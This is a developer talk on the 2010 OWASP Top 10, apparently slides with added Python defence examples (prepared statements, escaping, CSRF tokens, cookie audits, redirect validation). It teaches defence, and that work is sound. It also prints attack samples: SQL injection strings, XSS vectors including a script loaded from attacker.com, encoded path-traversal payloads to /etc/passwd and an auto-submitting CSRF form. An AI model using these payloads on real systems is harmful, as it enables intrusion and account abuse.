OWASP Top 10 from a developer's perspective
John Wilander, OWASP/Omegapoint, IBWAS'10
John Wilander, consultant at Omegapoint in Sweden
Researcher in application security
Co-leader OWASP Sweden
Certified Java Programmer
OWASP Top 10: Top web application security risks 2010
OWASP
1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
Injection ...the good old, boring stuff
sql = "SELECT * FROM users WHERE firstName = '" + fname + "' AND surName = '" + sname + "'";
fname = ' OR 1=1--
sname = blabla
sql = "SELECT * FROM users WHERE firstName = '" + "' OR 1=1--" + "' AND surName = '" + "blabla" + "'";
SELECT * FROM users WHERE firstName = '' OR 1=1--' AND surName = 'blabla'
SELECT * FROM users (everything after -- is a comment, so the surName condition is gone)
Input Validation?
fname = John, sname = Wilander
Accept: A-Za-z

fname = Luís, sname = Grangeia
Accept: A-Za-zí

fname = João, sname = Franco
Accept: A-Za-zíã

fname = {some name}, sname = {some name}
Accept: A-Za-zíãåäöüû..........

fname = {some name}, sname = {some name}
Accept: \p{L}

fname = Oliver, sname = O’Heir
Accept: \p{L}

fname = Oliver, sname = O’Heir
Accept: \p{L}’

fname = Fredrik, sname = Jägare-Lilja
Accept: \p{L}’

fname = Fredrik, sname = Jägare-Lilja
Accept: \p{L}’-

fname = John Eric, sname = Wilander
Accept: \p{L}’-

fname = ’OR ‘a’ IS NOT NULL--, sname = blabla
Accept: \p{L}’-
But ...
’OR ‘a’ IS NOT NULL--
is not a name!
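The allow-list the slides grow step by step, written out as an added example (not code from the talk). It implements \p{L} with unicodedata and the extra characters the slides had to admit for O'Heir and Jägare-Lilja; the slides' typographic quotes are assumed to be plain apostrophes. The sample names and the two injection strings are constructed from the slides. It shows the slide's point: the set that finally accepts "John Eric" (a space) also accepts 'OR 'a' IS NOT NULL--, because that string is nothing but letters, apostrophes, spaces and hyphens.

```python
import unicodedata

# Constructed sample inputs, taken from the slides.
LEGIT_NAMES = ["John", "Wilander", "Luís", "Grangeia", "João", "Franco",
               "O'Heir", "Jägare-Lilja"]
INJECTION_1 = "' OR 1=1--"
INJECTION_2 = "'OR 'a' IS NOT NULL--"


def is_unicode_letter(ch: str) -> bool:
    """Same test as the regex class \\p{L}: any Unicode letter category (Lu, Ll, Lt, Lm, Lo)."""
    return unicodedata.category(ch).startswith("L")


def is_name(value: str, extra: str = "'-") -> bool:
    """Allow-list check: every character must be a Unicode letter or one of `extra`.

    `extra` defaults to the apostrophe and hyphen the slides add for O'Heir and
    Jägare-Lilja. The empty string is rejected.
    """
    if not value:
        return False
    return all(is_unicode_letter(ch) or ch in extra for ch in value)


def allowlist_report(extra: str = "'-") -> dict:
    """Run the slides' inputs through the allow-list and report which ones pass."""
    samples = LEGIT_NAMES + ["John Eric", INJECTION_1, INJECTION_2]
    return {s: is_name(s, extra) for s in samples}


if __name__ == "__main__":
    # With the slides' final set, "John Eric" is rejected for its space ...
    print(allowlist_report("'-"))
    # ... and once the space is allowed, the second injection string passes too.
    print(allowlist_report("'- "))
```

Run stand-alone it prints the two reports. Validation is still worth doing (it rejects the ' OR 1=1-- input outright, since digits and = never become name characters), but it cannot be the defence against injection; that is what prepared statements are for.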
PreparedStatement preparedStmt = connection.prepareStatement(
    "SELECT a, b FROM table WHERE c = ?");
preparedStmt.setInt(1, column);
ResultSet resultset = preparedStmt.executeQuery();
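The two query styles from the slides side by side, as an added example that is not code from the talk. It uses Python's sqlite3 module rather than JDBC: the `?` placeholders bound through `execute(sql, params)` play the role of the PreparedStatement's `?` and `setXxx()` calls. The users table (firstName, surName) and its three rows are constructed for the demo.

```python
import sqlite3

# Constructed sample table matching the slides' users/firstName/surName query.
SAMPLE_USERS = [("John", "Wilander"), ("Luís", "Grangeia"), ("João", "Franco")]


def make_db() -> sqlite3.Connection:
    """In-memory database with the slides' users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (firstName TEXT, surName TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn: sqlite3.Connection, fname: str, sname: str) -> list:
    """The slide's vulnerable pattern: the SQL text is built from the input."""
    sql = ("SELECT * FROM users WHERE firstName = '" + fname
           + "' AND surName = '" + sname + "'")
    return conn.execute(sql).fetchall()


def lookup_prepared(conn: sqlite3.Connection, fname: str, sname: str) -> list:
    """Parameterised query: the SQL text is fixed, the values travel separately.

    The database never parses the input as SQL, so ' OR 1=1-- is just a
    (non-matching) first name.
    """
    sql = "SELECT * FROM users WHERE firstName = ? AND surName = ?"
    return conn.execute(sql, (fname, sname)).fetchall()


def demo() -> dict:
    """Row counts for the slide's injected input under both styles."""
    conn = make_db()
    fname, sname = "' OR 1=1--", "blabla"      # the slide's input
    return {
        "concat_rows": len(lookup_concat(conn, fname, sname)),     # whole table
        "prepared_rows": len(lookup_prepared(conn, fname, sname)), # nothing
        "legit_rows": len(lookup_prepared(conn, "Luís", "Grangeia")),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated version yields `SELECT * FROM users WHERE firstName = '' OR 1=1--' AND surName = 'blabla'`; SQLite treats `--` as a comment to end of line exactly as the slide shows, and all three rows come back. The prepared version returns no rows for the same input and one row for a real name.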
XSS ...much more exciting!
Cross-site Scripting: run script cross-site
Is ...
<script src=”http://attacker.com/c.js”></script>
a name?
Just filter <script>, huh?
<img src=javascript:alert('XSS')>
<body onload=alert('XSS')>
<table background="javascript:alert('XSS')">
¼script¾alert(¢XSS¢)¼/script¾
<dependency>
  <groupId>org.owasp</groupId>
  <artifactId>antisamy</artifactId>
  <version>1.4</version>
</dependency>
OWASP AntiSamy
Content Security Policy
X-Content-Security-Policy: allow 'self';
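For the common case where the field is plain text (a name) and no HTML should survive at all, escaping on output is the complement to AntiSamy's HTML sanitising and to CSP. Added example, not code from the talk: it renders the slide's evasion strings into element content with Python's html.escape and emits the slide's pre-standard `X-Content-Security-Policy: allow 'self';` header next to the standardised `Content-Security-Policy: default-src 'self'` form (the mapping between the two is this example's assumption). The sample inputs are constructed from the slides.

```python
import html

# Constructed inputs: a legitimate name and the evasion strings from the slides.
SAMPLES = [
    "Oliver O'Heir",
    '<script src="http://attacker.com/c.js"></script>',
    "<img src=javascript:alert('XSS')>",
    "<body onload=alert('XSS')>",
]

PREFIX, SUFFIX = "<p>Hello, ", "!</p>"


def render_greeting(name: str) -> str:
    """Escape & < > " ' before interpolating user data into element content."""
    return PREFIX + html.escape(name, quote=True) + SUFFIX


def response_headers() -> dict:
    """Headers for the rendered page: the slide's header plus its standardised form (assumed equivalent)."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Security-Policy": "allow 'self';",
        "Content-Security-Policy": "default-src 'self'",
    }


def is_inert(rendered: str) -> bool:
    """Check that no user-controlled markup survived: the only tags are the template's own."""
    body = rendered[len(PREFIX):-len(SUFFIX)]
    return not any(ch in body for ch in "<>\"'")


if __name__ == "__main__":
    for s in SAMPLES:
        print(render_greeting(s), is_inert(render_greeting(s)))
```

Escaping is context-specific: this covers element content and quoted attribute values. It does not make `javascript:` URLs or inline event handlers safe when user data ends up in a URL or script context, which is where the `src=javascript:` and `onload=` vectors on the previous slide live; there, data must not be placed at all, or AntiSamy's policy-based sanitising is the tool.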
Session Management ...just a quick one
HTTP is stateless
GET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
Hold Your Sessions
• Session ID in URL: www.site.com/ … ;sessionid=1234
• Session ID in hidden form fields: <INPUT TYPE="hidden" NAME="sessionid" VALUE="1234">
• Session ID in cookie: Set-Cookie: sessionID="1234" …
HTTP + Session
GET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
About Cookies
• End user owns the cookies
  • don't trust cookies in the backend
  • don't hide anything in them
• JavaScript (thus XSS) can read cookies
  • use the httpOnly attribute
• Cookies are sent for all requests
  • use the secure attribute
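A small check for the two attributes the slide recommends, as an added example (not code from the talk): it parses a Set-Cookie header value, reports whether httpOnly and secure are missing, and builds a session cookie that carries both. The header values are constructed from the slide's `Set-Cookie: sessionID="1234"` line.

```python
# Constructed Set-Cookie values modelled on the slide's sessionID="1234" example.
WEAK_COOKIE = 'sessionID="1234"; Path=/'
STRONG_COOKIE = 'sessionID="1234"; Path=/; HttpOnly; Secure'


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and lower-cased attributes.

    Flag attributes (HttpOnly, Secure) map to True; valued ones (Path, Domain,
    Expires, Max-Age) keep their string value.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip().strip('"'), "attrs": attrs}


def audit_session_cookie(header: str) -> list:
    """Return the attributes from the slide that this Set-Cookie value lacks."""
    attrs = parse_set_cookie(header)["attrs"]
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")   # otherwise document.cookie (and so XSS) can read it
    if "secure" not in attrs:
        missing.append("Secure")     # otherwise it is also sent over plain http
    return missing


def build_session_cookie(name: str, session_id: str) -> str:
    """Emit a Set-Cookie value with both attributes set."""
    return f"{name}={session_id}; Path=/; HttpOnly; Secure"


if __name__ == "__main__":
    print(audit_session_cookie(WEAK_COOKIE))
    print(audit_session_cookie(build_session_cookie("sessionID", "1234")))
```

Useful as a unit test against a framework's session configuration, or run over captured response headers: any session cookie for which the audit returns a non-empty list is a finding.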
Insecure Direct Object Reference ...just a quick one
http://site.com/cms?file=report524.pdf
http://site.com/cms?file=../../../../../../../../../etc/passwd
Filter "../" huh?
..%2F (URL encoding)
%2E%2E%2F (URL encoding)
Li4v (Base64 encoding)
%002E%002E%002F (Unicode)
"..\" often has the same meaning as "../"
..%5C (URL encoding)
%2E%2E%5C (URL encoding)
Li5c (Base64 encoding)
%002E%002E%005C (Unicode)
OWASP ESAPI Access Reference Map
(Diagram) Browser URL: file=456772 → Access Reference Map: 456772 ↔ report524.pdf → WS / DB / FS
CSRF ...my current favorite!
(Slide animation) Two pages, each with a "What's on your mind?" box and a POST button.
John types "I love OWASP!" on john.com and posts it; the site shows "John: I love OWASP!".
The other page carries "I hate OWASP!" and POSTs it to john.com from John's browser; the site shows "John: I hate OWASP!".
<form id="target" method="POST" action="https://john.com/mind" style="visibility:hidden">
  <input type="text" value="I hate OWASP!" name="oneLiner"/>
  <input type="submit" value="Go"/>
</form>
<script type="text/javascript">
  $(document).ready(function() { $('#target').submit(); });
</script>
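What john.com is missing in the slide is a value the browser does not attach on its own. The synchronizer-token defence, as an added example that is not code from the talk: a random per-session token is embedded in the site's own form and checked on every POST; the cross-site form cannot know it, while the session cookie (which the browser sends regardless) is no longer enough. The session store, form field names and the `/mind` handler are constructed for the example.

```python
import hmac
import secrets


class CsrfGuard:
    """Synchronizer-token pattern: one random token per session, echoed in the
    site's own forms and verified on every state-changing request."""

    def __init__(self) -> None:
        self._tokens: dict = {}   # session id -> token (constructed in-memory store)

    def token_for(self, session_id: str) -> str:
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_urlsafe(32)
        return self._tokens[session_id]

    def render_form(self, session_id: str) -> str:
        """The site's own 'What's on your mind?' form, carrying the hidden token."""
        token = self.token_for(session_id)
        return ('<form method="POST" action="/mind">'
                f'<input type="hidden" name="csrf_token" value="{token}"/>'
                '<input type="text" name="oneLiner"/>'
                '<input type="submit" value="Go"/></form>')

    def verify(self, session_id: str, submitted) -> bool:
        """Constant-time comparison; missing token or unknown session fails closed."""
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        return hmac.compare_digest(expected, submitted)


def handle_post(guard: CsrfGuard, session_id: str, form: dict) -> tuple:
    """Constructed /mind handler. `session_id` stands for the session cookie, which
    the browser attaches to the cross-site POST as well; `form` is the POST body,
    which only the site's own form can fill with the right token."""
    if not guard.verify(session_id, form.get("csrf_token")):
        return 403, None
    return 200, f"John: {form['oneLiner']}"


if __name__ == "__main__":
    guard = CsrfGuard()
    sid = "session-of-john"                  # constructed session identifier
    token = guard.token_for(sid)
    print(handle_post(guard, sid, {"oneLiner": "I love OWASP!", "csrf_token": token}))
    print(handle_post(guard, sid, {"oneLiner": "I hate OWASP!"}))   # the hidden form's POST
```

The hidden form from the slide would carry the session cookie but no `csrf_token`, so it gets a 403 and nothing is posted as John. The token must be unpredictable per session and compared in constant time; tying it to the session (not a global secret) is what makes a token stolen from one user useless against another.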
Insufficient Transport Layer Protection
<div class="menu_login_container">
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">
Moxie's SSL Strip
• Terminates SSL
• Changes https to http
• Normal https to the server
• Acts as client
Moxie's SSL Strip
• Secure cookie? Strip the secure attribute off all cookies.
• Encoding, gzip? Strip all encodings in the request.
• Cached content? Strip all if-modified-since in the request.
• Sessions? Redirect to the same page, set-cookie expired.
OWASP Transport Layer Protection Cheat Sheet
http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
Unvalidated Redirects and Forwards ...
phishing all the way home!
Return Path et al
www.site.com/login?returnPath=www.site.com/secure?page=3
www.site.com/login?returnPath=www.attacker.com
www.site.com/login?returnPath=bit.ly/Kl89GT
ESAPI sendRedirect()
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html
sendRedirect(HttpServletResponse, String)
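A returnPath validator for the three slides above, as an added example that is not ESAPI's sendRedirect(). It accepts only targets that stay on www.site.com (the site's host from the slides, assumed here as the single allowed host) and falls back to a default page otherwise. Beyond the three slide inputs it also handles the scheme-relative `//host` form and backslashes, which some browsers treat as slashes, and non-http schemes.

```python
from urllib.parse import urlsplit

SITE_HOST = "www.site.com"   # the site's own host, from the slides


def safe_return_path(return_path: str, default: str = "/") -> str:
    """Return a redirect target that stays on SITE_HOST, or `default`.

    Accepts site-relative paths (/secure?page=3) and absolute or scheme-less
    URLs whose host is exactly SITE_HOST, and always hands back a relative
    path so the host can never be changed by the caller. Everything else
    (other hosts, URL shorteners, //host, backslash variants, other schemes)
    yields the default.
    """
    if not return_path:
        return default
    candidate = return_path.strip().replace("\\", "/")   # browsers treat \ as / here
    if candidate.startswith("//"):
        return default                                    # scheme-relative: another host
    if candidate.startswith("/"):
        parts = urlsplit(candidate)                       # already site-relative
    else:
        # Scheme-less forms like the slide's www.site.com/secure?page=3 parse
        # as a bare path; give them a scheme so the host becomes visible.
        absolute = candidate if "://" in candidate else "http://" + candidate
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https"):
            return default
        if (parts.hostname or "").lower() != SITE_HOST:
            return default
    path = parts.path or "/"
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    for rp in ["www.site.com/secure?page=3", "www.attacker.com", "bit.ly/Kl89GT",
               "//www.attacker.com/", "/\\www.attacker.com/", "javascript:alert(1)"]:
        print(f"{rp!r:32} -> {safe_return_path(rp)!r}")
```

Returning a relative path rather than echoing the validated URL is deliberate: the redirect is then issued against the site's own host whatever the parameter looked like, and the bit.ly case shows why a shortener can never be on the allow-list: the validator cannot see where it leads.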
1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
john.wilander@owasp.org
Twitter: @johnwilander
Blog: appsandsecurity.blogspot.com